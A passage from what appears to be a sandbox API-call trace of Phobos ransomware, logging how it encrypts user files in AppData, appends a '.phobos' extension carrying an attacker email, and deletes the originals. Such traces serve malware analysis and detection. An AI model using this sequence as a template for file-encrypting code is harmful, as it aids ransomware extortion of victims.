nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe00, lpOverlapped=0x0) returned 1 [0166.413] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe10, dwBufLen=0xe10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe10) returned 1 [0166.413] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe10, lpOverlapped=0x0) returned 1 [0166.414] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0166.414] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.414] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0, dwBufLen=0xa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0) returned 1 [0166.414] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0166.414] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x152, lpOverlapped=0x0) returned 1 [0166.414] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.414] CloseHandle (hObject=0x190) returned 1 [0166.414] CloseHandle (hObject=0x178) returned 1 [0166.414] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat")) returned 1 [0166.417] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0166.418] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4608) returned 1 [0166.418] CloseHandle (hObject=0x178) returned 1 [0166.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat")) returned 0x2020 [0166.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0166.418] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.418] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.419] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ba8) returned 1 [0166.419] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.419] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1200, lpOverlapped=0x0) returned 1 [0166.421] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1210, dwBufLen=0x1210 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1210) returned 1 [0166.421] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1210, lpOverlapped=0x0) returned 1 [0166.422] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0166.422] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.422] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0, dwBufLen=0xa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa0) returned 1 [0166.422] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0166.422] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x152, lpOverlapped=0x0) returned 1 [0166.423] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.423] CloseHandle (hObject=0x178) returned 1 [0166.423] CloseHandle (hObject=0x190) returned 1 [0166.423] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat")) returned 1 [0166.423] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.441] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4608) returned 1 [0166.441] CloseHandle (hObject=0x190) returned 1 [0166.441] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat")) returned 0x2020 [0166.441] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.442] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.442] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0166.442] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ba8) returned 1 [0166.442] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.442] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1200, lpOverlapped=0x0) returned 1 [0166.470] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1210, dwBufLen=0x1210 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1210) returned 1 [0166.470] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1210, lpOverlapped=0x0) returned 1 [0166.471] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0166.471] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.471] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80, dwBufLen=0x80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80) returned 1 [0166.471] CryptDestroyKey (hKey=0xa32be8) returned 1 [0166.471] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x132, lpOverlapped=0x0) returned 1 [0166.471] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.471] CloseHandle (hObject=0x190) returned 1 [0166.471] CloseHandle (hObject=0x178) returned 1 [0166.471] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat")) returned 1 [0166.472] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0166.485] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4608) returned 1 [0166.485] CloseHandle (hObject=0x178) returned 1 [0166.485] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat")) returned 0x2020 [0166.485] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0166.485] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.485] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.486] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ba8) returned 1 [0166.486] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.486] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1200, lpOverlapped=0x0) returned 1 [0166.487] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1210, dwBufLen=0x1210 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1210) returned 1 [0166.487] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1210, lpOverlapped=0x0) returned 1 [0166.488] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0166.488] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.488] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80, dwBufLen=0x80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80) returned 1 [0166.488] CryptDestroyKey (hKey=0xa32be8) returned 1 [0166.488] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x132, lpOverlapped=0x0) returned 1 [0166.488] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.488] CloseHandle (hObject=0x178) returned 1 [0166.489] CloseHandle (hObject=0x190) returned 1 [0166.489] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat")) returned 1 [0166.489] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.551] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2031) returned 1 [0166.551] CloseHandle (hObject=0x134) returned 1 [0166.551] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml")) returned 0x2020 [0166.551] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.551] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.551] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0166.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.695] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32da8) returned 1 [0166.695] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.695] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7ef, lpOverlapped=0x0) returned 1 [0166.696] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7f0, dwBufLen=0x7f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7f0) returned 1 [0166.696] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7f0, lpOverlapped=0x0) returned 1 [0166.697] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ba8) returned 1 [0166.697] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0166.697] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0166.697] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.697] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0166.698] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.698] CloseHandle (hObject=0x134) returned 1 [0166.698] CloseHandle (hObject=0x130) returned 1 [0166.698] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml")) returned 1 [0166.699] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0166.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.699] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=128000) returned 1 [0166.699] CloseHandle (hObject=0x130) returned 1 [0166.699] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js 